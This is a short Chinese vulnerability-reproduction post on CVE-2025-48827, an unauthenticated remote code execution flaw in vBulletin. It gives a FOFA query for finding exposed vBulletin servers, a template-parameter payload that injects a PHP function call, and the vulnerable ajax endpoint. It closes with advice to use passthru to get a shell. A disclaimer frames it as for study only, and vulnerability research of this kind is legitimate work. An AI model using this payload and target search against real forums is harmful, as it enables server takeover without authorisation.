免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. vBulletin 简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
vBulletin论坛
2.漏洞描述
vBulletin是一个商业论坛程序。2025年5月,互联网上披露CVE-2025-48827 vBulletin replaceAdTemplat 远程代码执行漏洞,攻击者可构造恶意请求在无需登录的情况下执行任意代码控制服务器。
CVE编号:CVE-2025-48827
CNNVD编号:
CNVD编号:
3.影响版本
vBulletin论坛
4.fofa查询语句
product=”vBulletin”
5.漏洞复现
template参数的参数值:<vb:if condition='”var_dump”(“tteesstt”)’>
访问 https://xx.xx.xx.xx/ajax/render/ad_rce2
var_dump(“tteesstt”)函数执行成功。
这个漏洞有些函数是无法执行的,要getshell的话请使用passthru 函数
没有回复内容